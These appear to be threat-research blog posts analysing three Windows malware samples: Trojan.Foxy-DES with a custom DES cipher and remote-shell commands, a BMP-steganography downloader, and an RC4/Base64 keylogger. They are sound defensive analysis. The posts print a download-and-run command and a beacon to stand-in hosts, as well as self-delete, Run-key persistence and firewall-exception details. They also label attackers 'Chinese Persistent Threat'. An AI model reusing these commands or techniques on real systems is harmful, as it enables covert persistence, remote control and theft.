Trojan.Foxy-DES Analysis:

 

 

Today we will take a look at another version of Trojan.Foxy. We first blogged about this Trojan about a year ago, and we continue to see the CPT actors continue to use this Trojan successfully. JMyers first described the behavior of this Trojan here. The version we will analyze today has an extended set of commands and obfuscates network traffic in a more robust manner than previous samples. In fact, one of the more interesting things about this Trojan is that it uses a custom implementation of the DES cryptographic algorithm on top of an interesting and fairly complex encoding scheme to obfuscate and de-obfuscate all of its network traffic.
 

File Name:   Trojan.Foxy-DES
File Size:   19456 bytes
MD5:         6f454bcb0d9627696be8d346689db064
SHA1:        9480b7a88e4c4308bb0e39a758500dbeae1ebdce
PE Time:     0x501793C0 [Tue Jul 31 08:13:52 2012 UTC]
PEiD Sig:    Microsoft Visual C++ 6.0
PEiD Crypto: DES [pbox] [long] :: 000038D0 :: 004052D0
Sections (4):
Name       Entropy   MD5
.text      6.34      fb9a2bbce9622f37e5e1fc17933eb3d7
.rdata     4.66      8c38daaa45dd867c02d83880f2ea5550
.data      2.5       4129aeb00f61c9ae51fd4c2317b86d6e
.rsrc      2.43      51dc2d043a592faf571f16ae1793ac72

AV: 1/42 (2.3%) [VIRUS TOTAL]

 

Note: The hash values above do not match the hash values listed on the Virus Total website. The obfuscated C2 (command and control) address was changed in the sample that was submitted to Virus Total. The hash values above are the correct hashes for the sample with the original obfuscated C2 address.
 
 

Entrenchment Method

This sample does not contain any functionality to entrench itself on the compromised system. Over the past year we have seen CPT actors moving laterally onto boxes and manually using this type of Trojan.

The Trojan was designed to execute a self-delete command (shown below), if: an exit command was sent from the C2 node or it could not reach the C2 node.

/c del <Trojan’s executable location> > nul

 
 

Encryption and Encoding Algorithms

Decoding C2 Information

At run time, one of the first tasks that this Trojan performs is to decode the destination IP address and the port number of the C2 node. This encoded C2 address is embedded as an Unicode string in the resource section of the Trojan’s binary (Resource Type: String | Resource Name: 1). The Unicode string is loaded into process memory space as an ASCII string and decoded using an algorithm loosely based on the Vigenère cipher. This encoding algorithm was described, in detail, in the previous Trojan.Foxy post by JMyers.  In fact, the only difference between the two encoding algorithms is the alphabet they use for encoding and decoding data.

Original Trojan.foxy alphabet:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@#=

Alphabet used by Trojan.Foxy-DES (keybard layout):
`1234567890-=~!@#$^&*()_+qwertyuiop[]QWERTYUIOP|asdfghjkl;'ASDFGHJKL:zxcvbnm,./
ZXCVBNM<>?

Key used by Trojan.Foxy-DES:
thequickbrownfxjmpsvalzydg

The decoded C2 address is in the following format:

<IP address>:<Port number>

 

Network Traffic Obfuscation

The Trojan utilizes a two stage encoding/encryption function to obfuscate traffic to and from the C2 node.

Note: Please, refer to the Trojan Communication Protocol section of this post for more information on the type and format of the data that is sent/received.
 

Stage 1 encoding:

The plaintext data (shown below) is passed through an encoded algorithm which performs 8 rounds (0-7) of encoding in repetition, one byte per round, until the end of the data is reached.

Offset        0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000    43 3A 5C 44 6F 63 75 6D  65 6E 74 73 20 61 6E 64    C:\Documents and
00000010    20 53 65 74 74 69 6E 67  73 5C 75 73 65 72 6E 61    Settings\userna
00000020    6D 65 5C 44 65 73 6B 74  6F 70 3E                   me\Desktop>

The plaintext data was prepared for encoding by adding marker values (0×0100 and 0×1010) in the beginning and the end of the data. These values were used as a type of demarcation to identify where the encoded data started and ended. Later on, when this data was decoded, the decoding function would check for these values.

At each round a byte of plaintext data is shifted left by the value of the current round (0-7) and ORed with a high byte of the previously shifted byte, shown below is the pseudo-mathematical representation of the encoding logic:

R0: 0x0100 * 20 = 0x0100 + 0x0000                = 0x0100
R1: 0x43   * 21 = 0x0086 + ((0x0100 * 20) / 255) = 0x0087
R2: 0x3A   * 22 = 0x00E8 + ((0x43   * 21) / 255) = 0x00E8
R3: 0x5C   * 23 = 0x02E0 + ((0x3A   * 22) / 255) = 0x02E0
R4: 0x44   * 24 = 0x0440 + ((0x5C   * 23) / 255) = 0x0442
R5: 0x6F   * 25 = 0x0DE0 + ((0x44   * 24) / 255) = 0x0DE4
R6: 0x63   * 26 = 0x18C0 + ((0x6F   * 25) / 255) = 0x18CD
R7: 0x75   * 27 = 0x3A80 + ((0x63   * 26) / 255) = 0x3A98
R0: 0x6D   * 20 = 0x006D + 0x0000                = 0x006D
R1: 0x65   * 21 = 0x00CA + ((0x6D   * 20) / 255) = 0x00CA
R2: 0x6E   * 22 = 0x01B8 + ((0x65   * 21) / 255) = 0x01B8
.
.
.
Rx: 0x0101 * 2x ...

In the example above, the round 0 serves as a type of “initiation” round and does not really encodes the byte it operates on.

The low byte of the resulting word (highlighted in green above) is written out as the encoded character and the high byte is used in the following round. Round 7 is the exception to this behavior, during the 7^th round both the low byte and the high byte are written out in little-endian order leaving the following round with null value.

Most of the encoding logic can be represented with the following formula:
 

 

In addition to the encoding logic described above, the encoding algorithm keeps track of every 2 byte combinations that are being encoded. As the algorithm continues to encode data, if it encounters byte combinations that have been previously encoded, the algorithm will simply make a reference, in the form of a round ID value, to the initial encounter. This removes the need to encode that specific byte combination again. The round ID number starts at hexadecimal value 0×0101 and is incremented by one for each 2 byte combination.

Example of an ID number being encoded is shown below (highlighted in yellow is the previous round IDs):

.
.
.
R0: 0x61   * 20 = 0x0061 + 0x0000                = 0x0061
R1: 0x0109 * 21 = 0x0212 + ((0x0061 * 20) / 255) = 0x0212
R2: 0x0104 * 22 = 0x0410 + ((0x0109 * 21) / 255) = 0x0412
R3: 0x65   * 23 = 0x0328 + ((0x0104 * 22) / 255) = 0x032C
.
.
.

After the encoding algorithm has finished, the resulting encoded data (shown below) is prepended with its size in hexadecimal (highlighted in red below) and passed to the custom DES cryptographic algorithm described later in this post. The final output of the encoding function is shown below:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000    31 00 87 E8 E0 42 E4 CD  98 3A 6D CA B8 A1 33 07    1 ‡èàBä͘:mʸ¡3
00000010    44 18 37 64 40 4C 29 43  87 4E 1A 37 67 E6 70 A9    D 7d@L)C‡N 7gæp©
00000020    33 A7 8C 1C 37 61 12 12  2C 33 67 0D 9D 37 70 7C    3§Œ 7a  ,3g  7p|
00000030    04 04

In order to decode the encoded data it is passed through an algorithm which performs 8 rounds (0-7) of decoding in repetition, until the end marker is reached. The decoding function reads 3 bytes, in little-endian order, of encoded data into a register and performs a right shift operation, shifting by the value of the current round (0-7). This results in 1 byte of decoded plaintext (the same effect can be achieved by dividing by the power of 2). Every new round an additional byte is moved into the buffer and the last byte is dropped off (with exception of the round 0 where 2 bytes are moved in and 2 last bytes are dropped off), shown below is pseudo-mathematical representation of the encoding logic:

R0: 0xE88700 / 20 = 0xE88700
R1: 0xE0E887 / 21 = 0x707443
R2: 0x42E0E8 / 22 = 0x10B83A
R3: 0xE442E0 / 23 = 0x1C885C
R4: 0xCDE442 / 24 = 0x0CDE44
R5: 0x98CDE4 / 25 = 0x04C66F
R6: 0x3A98CD / 26 = 0x00EA63
R7: 0x6D3A98 / 27 = 0x00DA75
R0: 0xB8CA6D / 20 = 0xB8CA6D
R1: 0xA1B8CA / 21 = 0x50DC65
.
.
.

In the end, the low byte of the resulting value (highlighted in blue above) is written out as the decoded character.

When the decoding function runs across an encoded round ID number it uses the decoded characters previously decoded during that round.
 

Stage 2 encryption (custom DES):

Once the data is encoded it is then encrypted using a custom version of cryptographic algorithm named Data Encryption Standard (DES) in the Electronic Code Book (ECB) mode of operation and utilizing the following key:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000    54 63 70 4C 69 73 74 65                              TcpListe

Note on DES: DES is a block cipher, based on Horst Feistel’s Lucifer algorithm, developed by a team at IBM in the 1970s. It is a Feistel-based cipher which operates on a 64 bit blocks of data, and enciphers data using a 64 bit private key (however, only 56 bits of the key are used, the remaining 8 bits are used for parity). The 64 bit blocks of plaintext data are transformed into ciphertext through various permutation operations and 16 rounds of the Feistel structure. DES is capable of operating in 5 modes: Electronic Code Book (ECB) mode (DES native mode), Cipher Block Chaining (CBC) mode, Cipher Feedback (CFB) mode, Output Feedback (OFB) mode, and Counter (CTR) mode.

It is important to note that this Trojan implemented a custom version of the DES cryptographic algorithm, meaning that even if you had the right key it would be impossible to decipher the encrypted data using standard version of DES.

The customization is implemented in the form of two changes to the standard algorithm. The first change is made in the Permuted choice 2 table (PC-2), the 36^th value in the table is decremented by 1 changing it from 48 to 47. Shown below is the PC-2 table with changed value highlighted in yellow.

 

 

Note on PC-2 table: The PC-2 table is used in the DES’s key scheduling procedure to create a set of 16 sub-keys from the original 64 bit key. In particular, the table is used as a final permutation for each key (which reduces the size of each sub-key to 48 bits).

The second change is the bit order in which data and the key are inputted and outputted to and from the DES algorithm. As mentioned before, DES operates on 64 bit blocks of data. In the standard implementation of DES every 8 bytes are broken up, in most significant bit order into 64 bits. In this version, however, the malware author changed this behavior so that the same 8 bytes are broken up in least significant bit order. For example, let’s take an 8 byte ASCII string “AliceBob” which has to be broken down into 64 bit block before DES can operate on it:

 

Standard DES implementations: “AliceBob” in hexadecimal: 41 6C 69 63 65 42 6F 62 AliceBob Converted to binary in most significant bit order: 0 1 0 0 0 0 0 1 0 1 1 0 1 1 0 0 0 1 1 0 1 0 0 1 0 1 1 0 0 0 1 1 0 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 0 1 1 0 1 1 1 1 0 1 1 0 0 0 1 0

Custom DES implemented in this Trojan: “AliceBob” in hexadecimal: 41 6C 69 63 65 42 6F 62 AliceBob Converted to binary in least significant bit order: 1 0 0 0 0 0 1 0 0 0 1 1 0 1 1 0 1 0 0 1 0 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 1 0 1 1 1 1 0 1 1 0 0 1 0 0 0 1 1 0

 

This same logic is repeated when the 64 bit blocks are converted back to bytes, after DES performed its encryption routines.

It is interesting to note, that this bit order change is made in the input and output functions for DES, the DES cryptographic algorithm itself for the most part remains unchanged (with exception of the change to the PC-2 table).

 

 

Trojan Communication Protocol

All traffic between the Trojan and the C2 node is obfuscated using the encryption and encoding algorithms described above. Sent and received data is prepended with a size (2 bytes in length, highlighted in yellow) and appended with value used to calculate the size of the decrypted data (1 byte in length, highlighted in green). Shown below is the encrypted and encoded activation command sent to the Trojan:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000    00 11 3F B5 90 3F 05 C1  18 D2 3B AA 60 AF F6 CE    ?µ ? Á Ò;ª`¯öÎ
00000010    DE 1D 06                                            Þ

Once the Trojan establishes connection to the C2 node it does not transmit any data, instead, the Trojan waits to receive an activation command (ASCII string “active” encrypted and encoded) from the C2 node.

Once the “active” command is received, the Trojan creates a new instance of cmd.exe (command prompt), with the command-line switch “/k”, as a child process. The output from this command prompt is piped through the Trojan, encoded/encrypted, and then transmitted to the C2 node. At this point the Trojan is ready to receive, de-obfuscate and execute commands from the C2 node.

 

 

Trojan Functionality

The Trojan is capable of receiving and executing the following commands:

 

Trojan Commands	Example	Description
gf <File Path>	gf C:\folder\file.bin	A “get file” command, the Trojan expects to receive the location and filename of the file to be transmitted. It then opens the specified file, retrieves opened file’s logical size, and sends the size back to the C2 node. The Trojan then expects to receive the file-offset to read from within the opened file. Once the file-offset is received the Trojan reads 999 bytes of data from the given offset, encrypts that data, and sends the encrypted data back to the C2 node. This logic continues until the end of the file is reached or “qf” command is sent to the Trojan.

 

pf <File Path>

pf C:\folder\file.bin

A “put file” command, the Trojan expects to receive the location and filename of the file to be written to. It then opens the specified file, retrieved opened file’s logical size, and sends the size back to the C2 node. The Trojan then expects to receive the size of the data that will be written to the opened file. Once the size is received the Trojan expects to receive 300 bytes of encrypted data from the C2 node. This data is decrypted and written to the end of the opened file. This logic continues until all the data is written to the file or “qf” command is sent.

 

qf

qf

A “quit file” command, stops reading from or writing to the specified file.

 

wait: <decimal number>

wait:100

A sleep command. The decimal number passed along with this command is used in calculation of a new sleep period.

 

!<command-line argument>

!dir

Creates second cmd.exe process, with command-line switch “/c” and pipes the command-line argument, following the exclamation point (!), to the newly created cmd.exe process. Executed command example: cmd.exe \c <sent command-line argument>. The resulting output is piped through the Trojan, encrypted, and sent back to the C2 node.

 

exit

exit

Terminates the current session between the Trojan and the C2 node.

 

<ASCII string>	Default Case Any other ASCII string	The string is piped to an earlier created cmd.exe process, with the command-line switch “/k”. Executed command example: cmd.exe \k <ASCII string>. The resulting output is piped through the Trojan, encrypted, and sent back to the C2 node.
Trojan Commands	Example	Description

 

Below is a relevant ASCII string dump from Trojan.Foxy-DES’s binary:

active
/k
%s\cmd.exe
xxxxx: %d!
\cmd.exe /c
exit
wait:
exit
pf
gf
%ld
xxxxx
!!!!!
_open '%s' failed with error %d. %d
> nul
/c del
thequickbrownfxjmpsvalzydg
`1234567890-=~!@#$^&*()_+qwertyuiop[]QWERTYUIOP|asdfghjkl;'ASDFGHJKL:zxcvbnm,./
ZXCVBNM<>?
Dcryption Error! Invalid Character '%c'.

Downloader.BMP

 

 

 

Today I am going to write about an interesting Trojan, whose functionality is nothing special, however the method in which this Trojan receives commands is quite interesting.  We received this sample from a client for analysis on May 22nd, you can see from the compiled date, that the sample was created on May 15th.  This Trojan will request a BMP image file.  This BMP image file contains commands which have been encoded into the file using what I consider to be steganography.  This isn’t the first I have heard of a sample that employs steganography, however this is the first CPT (Chinese Persistent Threat) sample that I have personally analyzed that uses steganography.  We have blogged before about how the comment crew has encoded instructions into JPG files.  This shift to encoding commands into BMP files makes it more difficult to detect files that are being used maliciously.  This sample really only has two commands either to sleep or download a file and execute that file.  While this type of Trojan like many others used by this adversary is not very sophisticated (which is why we are substituting the Advanced with Chinese in APT), downloaders are important tools in the adversary’s repertoire.

 

 

Downloader.BMP Analysis

File Name:  Downloader.BMP.exe
File Size:  9216 bytes
MD5:        d166a59e71535a42267e9fa993ca8e7e
SHA1:       be82f72b38f93912a470b248d4885129e8bd45e7
PE Time:    0x4FB1CAB0 [Tue May 15 03:17:04 2012 UTC]
Sections (4):
  Name      Entropy  MD5
  .text     6.4      ed12789f7ce24a2d453b824b4a5cac0c
  .rdata    4.81     c3359a12181cff8d3f096357263fcbf0
  .data     4.34     6732a87585ba80bcf5cde07762f91e4d
  .rsrc     3.83     485f6d9764b3db03346559c57b30fb61

AV: 9/42 (21.4%) [VIRUS TOTAL]

 

It should be noted that the hash values above do not match the hash values listed in Virus Total.  The obfuscated C2 location was removed from the sample that was submitted to Virus Total.  The hash values above are the correct hashes for the sample with the obfuscated C2 location still in place.  

 

• This sample entrenches itself on the compromised machine in the following location, with the data value pointing to the location where the sample was executed from (ex. C:\WINDOWS\system32\bad.exe).

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

•  This sample also makes the following registry change.  This change adds an exception to the Windows Firewall allowing the program to gain access to the internet.

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters
\FirewallPolicy\StandardProfile\AuthorizedApplications\List

•  The data value for this key will be the current location of the binary executable file (which is the same as the entrenchment) followed by the following text.

filelocation\bad.exe:*:Enabled:Network Location Awareness (NLA)

• The entrenchment and Firewall changes are very old techniques, however if you have never seen this method there are images at the end of this blog that depict the Windows Firewall changes and the added exception.

Decoding C2 Information

After the sample entrenches itself it will decode the C2 location.  This sample will load the RT_string structure that is stored in the resource section of the executable’s binary, which can be seen below.  The first two bytes of the structure (in red) which in the example below are 0x 4B 00, represent the length of the following Unicode string, which will be decoded using the Base64 encoding scheme.

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   4B 00 35 00 36 00 68 00  56 00 68 00 5A 00 69 00   K 5 6 h V h Z i
00000010   39 00 33 00 35 00 31 00  2F 00 43 00 4B 00 31 00   9 3 5 1 / C K 1
00000020   6D 00 31 00 62 00 70 00  30 00 32 00 33 00 47 00   m 1 b p 0 2 3 G
00000030   71 00 68 00 36 00 74 00  57 00 69 00 6E 00 61 00   q h 6 t W i n a
00000040   68 00 41 00 36 00 69 00  68 00 35 00 5A 00 6C 00   h A 6 i h 5 Z l
00000050   6D 00 44 00 5A 00 4E 00  58 00 43 00 33 00 57 00   m D Z N X C 3 W
00000060   34 00 6C 00 33 00 39 00  55 00 32 00 59 00 4C 00   4 l 3 9 U 2 Y L
00000070   56 00 69 00 36 00 74 00  2F 00 43 00 33 00 35 00   V i 6 t / C 3 5
00000080   56 00 6C 00 33 00 39 00  35 00 34 00 6E 00 47 00   V l 3 9 5 4 n G
00000090   50 00 43 00 5A 00 5A 00                            P C Z Z

 

 

• This sample will then load that Unicode sting into memory (shown below) and decode that string using the Base64 scheme using and a custom alphabet mapping.

Original String - 56hVhZi9351/CK1m1bp023Gqh6tWinahA6ih5ZlmDZNXC3W4l39
                  U2YLVi6t/C35Vl3954nGPCZZ

Decoded Result  - Uc10CYMTgrDrDmtI861nA71LicLTD2tJBq0TA6pH9q5ngq5qA6US8+pA

 

• The next step is what I think is an interesting way to frustrate someone who is dynamically analyzing this sample.  The sample will then switch the first and last letter of the decoded string.

Original String - Uc10CYMTgrDrDmtI861nA71LicLTD2tJBq0TA6pH9q5ngq5qA6US8+pA
Decoded Result  - Ac10CYMTgrDrDmtI861nA71LicLTD2tJBq0TA6pH9q5ngq5qA6US8+pU

 

I have seen samples before that mangle data or add junk data to an obfuscated string.  This is a very effective way of defeating automated processes that search for and attempt to decode strings. 

 

• Once the first and last letter have been switched.  This sample will again decode that string using the Base64 scheme and the same custom alphabet mapping that was used in the first decoding pass.

Original String - Ac10CYMTgrDrDmtI861nA71LicLTD2tJBq0TA6pH9q5ngq5qA6US8+pU
Result          - http://www.badsite4you.com/images/evil.bmp

It should be noted that the above decoded URL is an example and not an actual C2 node.  

Network Analysis

• The sample will then beacon with the following type of request, which is deconstructed below:

GET /images/evil.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. )4IRh2K1I3Zl=O
Host: www.badsite4you.com
Cache-Control: no-cache

 

 

The data in red is hard coded into the sample’s binary.  The data that is highlighted in yellow is the encoded host name (in this example: victim).  The encoded host name can be decoded utilizing the same method as described earlier in this post. An example of the decoding process is shown below:

 

Original Encoded String  - 4IRh2K1I3Zl
Decoded String - D+LJDbLR
Letters Switched - R+LJDbLD
Decoded String   - victim

 

The data that is highlighted in green is determined by the sample at run time.  Just prior to the initial beacon the sample will enumerate all of the running processes specifically looking for the two programs ccSvcHst.exe (related to Symantec Anti-Virus) and Mcshield.exe (related to McAfee Antivirus).  If the sample locates ccSvcHst.exe then it will place the ASCII letter S (0×53), after the equal sign, presumably to signify Symantec.  If the sample locates Mcshield.exe then it will place the ASCII letter M (0x4D), after the equal sign, presumably to signify McAfee.  If the sample finds neither process running it will place the ASCII letter O (0x4F) after the equal sign (which is seen in the example above).  The O is possibly for either OTHER or “Oh, you’re not running AV”, both of which are just guesses.  This particular sample would not kill the process if it determined either was running.

The sample expects to get a reply from the C2, it isn’t particular about what is sent back.  The sample will then beacon a second time with the following type of HTTP GET request:

 

GET /images/evil.bmp HTTP/1.1
Accept: */*
User-Agent: Agent188712124
Host: www.badsite4you.com
Cache-Control: no-cache

The User-Agent is the only thing that changed from the previous HTTP GET request.  The Agent portion of the User-Agent is hard coded into the sample.  The remaining data, in this case 188712124, is calculated right before the GET request is sent out.  This number is a return from an API which gets the time, in milliseconds, since Windows was started.

The sample will expect to receive a BMP file from the C2 location, however it will save the file that it is served as temp.jpg in the current user’s Temp folder.  The sample will load the header from the BMP file into memory.  At this point I will discuss some of the key areas of a BMP file header.

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   42 4D 36 2C 02 00 00 00  00 00 36 00 00 00 28 00   BM6œ      6   (
00000010   00 00 25 02 00 00 40 00  00 00 01 00 18 00 00 00     %   @
00000020   00 00 00 9C 01 00 00 00  00 00 00 00 00 00 00 00      œ
00000030   00 00 00 00 00 00 F6 42  36 65 22 31 F7 73 00 00
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00000050   00 00 00 00 00 00 00 01  01 01 00 00 01 01 00 01
00000060   01 00 01 01 00 00 00 01  01 00 00 01 00 01 00 01
00000070   01 00 00 01 00 01 00 01  01 01 00 00 00 00 00 00
00000080   01 01 01 00 01 00 00 00  01 01 00 00 01 00 00 00
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

• The data in red is the BMP file signature.
• The Dword highlighted in yellow is the BMP file’s size, in this case 0x 22C36 or 142390 decimal
• The Dword highlighted in green is the offset into the file where the actual bitmap starts, in this case 0×36
• The Dword in blue is the DIB header and represents how large the header is, in this case 0×28 bytes.  The other data following this header is size ,width, height, and other information about the image file.
• The data highlighted in blue is the first Qword of the actual pixel array or bitmap.

 

The sample will next read this Qword into memory.  This data is encoded and once decoded will represent the length of the command to be decoded.  The command length and the actual command are decoded in the same manner, which is described below.

 

The sample will take, from the example above, the string 0x F6 42 36 65 22 31 F7 73.  The sample will then take the first byte (0xF6) and break it down into its respective bits.

Original Byte -0x F6
Corresponding Bits - 1 1 1 1 - 0 1 1 0

 

At a high level this sample will determine if there is an even or odd number of the binary digit 1, in the bits which comprise the byte.  If there is an even number of the binary digit 1 (example: 0101 – 0101) in the byte, it will be represented as a 0 in the first bit of the decoded byte.  If there is an odd number of the binary digit 1 (example: 0101 -0111) in the byte, it will be represented as a 1 in the first bit of the decoded byte.  When I was writing a script to decode the BMP files, I realized that this same process could be carried out by counting the number of 1′s in the bits and dividing by two; if the remainder is 1 then the bit would be a 1 and if the remainder was 0 then the bit would be a 0.  The complete Qword is decoded below:

 

Byte - 0xF6 - 1 1 1 1 - 0 1 1 0 = 0
Byte - 0x42 - 0 1 0 0 - 0 0 1 0 = 0
Byte - 0x36 - 0 0 1 1 - 0 1 1 0 = 0    The results on the left can be
Byte - 0x65 - 0 1 1 0 - 0 1 0 1 = 0    combined to form the decode byte:
Byte - 0x22 - 0 0 1 0 - 0 0 1 0 = 0    decoded = 0000 - 0111 = 0x07
Byte - 0x31 - 0 0 1 1 - 0 0 0 1 = 1
Byte - 0xF7 - 1 1 1 1 - 0 1 1 1 = 1
Byte - 0x73 - 0 1 1 1 - 0 0 1 1 = 1

The sample will now interprets the decoded byte (0×07) as the length of the decoded command.  The sample will then go to the start of the bitmap, offset 0×36 plus 0×20.  Regardless of where the bitmap starts (0×36 in the example above) the sample will add 0×20 bytes to that starting position as the location of where the encoded command data begins.

 

This sample will then go to offset 0×56 (which is where the encoded data begins) and the sample will load 0×38 bytes (56 bytes decimal) of data into memory.  This value is derived by taking the decoded byte from above (0×07) and multiplying that value by 0×08, because each decoded byte requires 8 actual bytes of data.  The data highlighted in red above, from the sample BMP file, would be loaded into memory 8 bytes at a time by the Trojan.  Each of those 8 bytes would then be decoded in the same manner as  described above.  The sample data from above is listed as 0×00 or 0×01 to make it easier to observe the pattern.  The 0×38 bytes of data from the sample data above have been deconstructed below:

 

00 01 01 01 - 00 00 01 01 = 73

00 01 01 00 - 01 01 00 00 = 6C 

00 01 01 00 - 00 01 00 01 = 65     These decoded bytes (0x 73 6c 65 65 70 3A 32)
                                   in ASCII are sleep:2
00 01 01 00 - 00 01 00 01 = 65     which is the decoded command 

00 01 01 01 - 00 00 00 00 = 70

00 00 01 01 - 01 00 01 00 = 3A

00 00 01 01 - 00 00 01 00 = 32

 

This sample was written to only accept two commands either sleep: or run:.  If the command is sleep it will take the number that is provided and then convert it to a large number in a short function, that larger number will be used as the number of milliseconds for the sample to sleep.  The function that calculates the sleep is displayed below:

 

 

 

 

If the command is run:, the sample will download a file and then start that file as a new process.  An example of that command would be run:http://www.badsite.com/img/150489.exe.  Given that example the sample would download the file from the URL http://www.badsite.com, save it as 150489.exe under the user’s Temp directory, and then start that executable as a new process.  The sample is written to then sleep for 3 minutes and beacon out again.

 

I took the image at the beginning of this blog and changed the appropriate bits so that this sample would decode a message from it. If you look closely you can tell that there are some visual differences, however I was not careful about how I implemented these changes, I simply changed the least significant bit to match my needs.

 

 

 

 

Windows Firewall Changes and Added Exceptions

 

The red box in the image above highlights that an exception was added to the Windows Firewall

 

 

The red box in the image above shows the path of the program that was added, which in this case is the sample being analyzed.

 

 

Today I will take a quick look at a keystroke logger whose unpacked version has a much lower detection rate on VT then its UPX packed version, and which uses RC4 encryption and Base64 encoding with a custom alphabet.

We picked up this file recently while observing some APT activity on a victim’s network, and this is yet another tool in these actors’ arsenal.

This keystroke logger does not have the ability to communicate over the wire, so if you find it in your environment your should look for other Trojans that would give the actors access to your network.

The characteristics of this file are shown below:

File Name:  BRKBL.exe
File Size:  6144 bytes
MD5:        8a4bdb85acdfbf77ccadc3415d848bd7
SHA1:       aa45d3596f00042eb2f0cd5a78d7666b3034f63d
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
PEID Sig:   UPX 2.90 (LZMA)
VT:         9/43 on 2011-11-07 15:32:12 UTC
VT:         15/43 on 2012-29-02 16:44:27 UTC

Interestingly, the unpacked version of this file has a lower detection rate as of today:

File Name:  BRKBL-unpacked.exe
File Size:  8192 bytes
MD5:        ebdc4d363da8b97ab65df9bf921e1b56
SHA1:       c9754d84d9a2c925c0271ad36e572858637fa1cc
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
VT:         3/43 on 2012-02-29 15:16:00 UTC

This keystroke logger logs the data in a file named C:\DOCUME~1\username\LOCALS~1\Temp\ade######.Tmp, where ###### is the YYMMDD of when the file is created.

The entrenchment location is: SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

The captured window titles along with any keystrokes are first RC4 encrypted using this 128-bit key (0×02000008000302060001090801000702):

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   02 00 00 08 00 03 02 06  00 01 09 08 01 00 07 02

In case you have never seen what the RC4 algorithm looks like in assembly, here is a peak at the building of the 256 byte table (0×00 – 0xFF) and the loop that mixes in the key:

Encrypting the data with RC4 is the easy part of the obfuscation employed by this Keystroke logger.

The RC4 encrypted data is then Base64 encoded using a custom alphabet. Typically, the custom alphabet is sitting somewhere within the binary file, so it would be easy to test out (e.x. look at http://www.cyberesi.com/2011/11/02/trojan-prime/).

In this keystroke logger the custom alphabet is implemented in logic and is thus not visible. So, I will share with you a little trick that I use to let the Trojan/Keylogger tell me what the alphabet is.

In order to determine the custom alphabet you first need to find the subroutine that will encode the data. The easiest thing to do (at least the first thing I try) to find the subroutine is to put a hardware breakpoint at the first byte of your plain text. In this case, this hardware breakpoint would have landed you at the RC4 encryption algorithm. Next, you put a hardware break point at the first byte of the RC4 encrypted data, which will land you somewhere in the middle of the subroutine that does the Base64 encoding. In this case, the beginning of the subroutine is at address 0×00401080.

Next, if you look at the argument passed to this subroutine you will see that among other things are:

1.  A pointer to where the RC4 encrypted data is located.
2.  The length of the encrypted data (change this to 0x30)
3.  A pointer to an output buffer (where the encoded data will end up).

The way to trick the keystroke logger (or any other Trojan for that matter) to give us the custom alphabet is to replace the RC4 encrypted data with this raw data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   00 10 83 10 51 87 20 92  8B 30 D3 8F 41 14 93 51     ƒ Q‡ ’‹0Ó A “Q
00000010   55 97 61 96 9B 71 D7 9F  82 18 A3 92 59 A7 A2 9A   U—a–›qן‚ £’Y§¢š
00000020   AB B2 DB AF C3 1C B3 D3  5D B7 E3 9E BB F3 DF BF   «²Û¯Ã ³Ó]·ãž»óß¿

Where did this data come from, you may be wondering? Well, this data is what you get when you decode the standard Base64 alphabet itself (shown below):

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

And obviously, if you were to Base64 encode the raw data back, you would get the standard alphabet back.

Understanding precisely why this data will give us the custom alphabet requires a good understanding of the Base64 algorithm. However, the basic idea is that this data is special, in that when the encoding algorithm is performed on it, it produces index values 0 through 63 in order, thus forcing the Trojan to map the index values to its custom alphabet letters in order. As I said, this trick will work on any Trojan that uses the Base64.

So, once you pass this data to the algorithm you will find the custom alphabet on the output buffer. This Trojan uses this custom alphabet to Base64 encode the RC4 encrypted data:

16BGLQVafkpuz27CHMRWbglqv-38DINSXchmrw/49EJOTYdinsx0FKPUZejoty5A

Here are the strings of this Trojan (from the unpacked version):

Text strings referenced in BRKBL:.text
Address                              Disassembly                Text string
004012AA                             PUSH BRKBL.00403720        ASCII "Windows Title: %s"
00401450                             PUSH BRKBL.00403740        ASCII "%s <Buffer Full>"
00401475                             PUSH BRKBL.00403734        ASCII "%s<Enter>"
00401584                             PUSH BRKBL.00403760        ASCII "%s\ade%02d%02d%02d.Tmp"
004015B5                             PUSH BRKBL.0040375C        ASCII "%s"
00401618                             PUSH BRKBL.00403758        ASCII "a+"
00401630                             PUSH BRKBL.00403754        ASCII "%s|"
004016A8                             PUSH BRKBL.00403780        ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
004016D4                             PUSH BRKBL.00403778        ASCII "UPDATA"
00401A16 BRKBL.<ModuleEntryPoint>    PUSH EBP                   (Initial CPU selection)
